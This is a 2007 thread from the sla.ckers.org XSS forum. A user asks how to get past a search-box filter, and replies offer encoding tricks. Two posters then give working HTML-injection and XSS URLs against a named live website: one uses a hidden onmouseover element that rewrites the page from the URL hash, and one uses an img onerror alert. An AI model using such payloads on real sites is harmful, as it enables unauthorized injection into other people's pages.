Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Need help with filters
Posted by: hwEll
Date: June 28, 2007 12:33PM

I am trying to find a XSS hole thus i tried

'';!--"<XSS>=&{()}

from the cheat sheet and when i viewed the souce i get this

Search for: <input type='text' name='stext' value='&#39;&#39;;!--&quot;&lt;XSS&gt;=&{()}' class='textbox' style='width:200px'>

Any help with it?

Options: ReplyQuote
Re: Need help with filters
Posted by: nEUrOO
Date: June 28, 2007 03:32PM

Well, they seem to have a correct filter, so there is not much you could do here...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Need help with filters
Posted by: Kyran
Date: June 28, 2007 08:51PM

The short locator doesn't cover everything. Try multiple quotes, etc.

- Kyran

Options: ReplyQuote
Re: Need help with filters
Posted by: Anonymous User
Date: June 29, 2007 05:28AM

You could also check how the filter reacts on entities - try to inject stuff like %27, %2%277, &#39; or &#3&#399;

Options: ReplyQuote
Re: Need help with filters
Posted by: hwEll
Date: June 30, 2007 05:44AM

Nope i dont get it..what should i do?what do you need me to inject and see?

Options: ReplyQuote
Re: Need help with filters
Posted by: Anonymous User
Date: June 30, 2007 07:21AM

URL?

Options: ReplyQuote
Re: Need help with filters
Posted by: hwEll
Date: June 30, 2007 07:44AM

http://homegrownsecurity.org/

Options: ReplyQuote
Re: Need help with filters
Posted by: Mephisto
Date: June 30, 2007 09:22AM

HTML Injection

http://homegrownsecurity.org/search.php?stype=f'><h1><font%20color='red'>Injected%20HTML</font></h1>

Options: ReplyQuote
Re: Need help with filters
Posted by: Anonymous User
Date: June 30, 2007 10:10AM

Doesn't work on Firefox

Options: ReplyQuote
Re: Need help with filters
Posted by: ma1
Date: July 01, 2007 05:10PM

XSS
http://homegrownsecurity.org/search.php?stype=f'style='width:5000;height:5000;opacity:0;position:absolute;top:-2000;left:-2000;z-index:1000'onmouseover='document.body.innerHTML=location.hash#<img/src='404'onerror=alert(1)>

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Need help with filters
Posted by: hwEll
Date: July 02, 2007 02:45PM

Thanks

Options: ReplyQuote


Go to: Forum ListMessage ListSearchLog In
Sorry, only registered users may post in this forum.
Click here to login

Falling Rock Networks

sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle. *